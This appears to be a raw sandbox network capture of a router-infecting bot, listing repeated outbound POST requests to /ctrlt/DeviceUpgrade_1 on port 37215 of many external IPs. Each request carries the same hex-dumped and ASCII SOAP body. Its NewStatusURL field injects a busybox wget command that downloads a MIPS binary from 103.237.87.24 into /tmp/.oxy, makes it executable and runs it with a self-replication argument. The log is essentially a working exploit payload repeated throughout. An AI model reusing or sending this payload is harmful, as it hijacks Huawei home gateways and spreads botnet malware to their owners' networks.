                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2455192.168.2.1351936197.53.183.3837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631772995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2456192.168.2.1352512197.252.147.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631840944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2457192.168.2.1350566157.207.178.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631865978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2458192.168.2.134264441.134.199.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.631874084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2459192.168.2.134184877.16.155.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.632738113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2460192.168.2.135425673.160.132.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.632761955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2461192.168.2.1343436197.201.188.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.632774115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2462192.168.2.1354384157.18.77.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.633055925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2463192.168.2.133308441.158.128.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.633076906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2464192.168.2.1343960146.176.216.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.633109093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 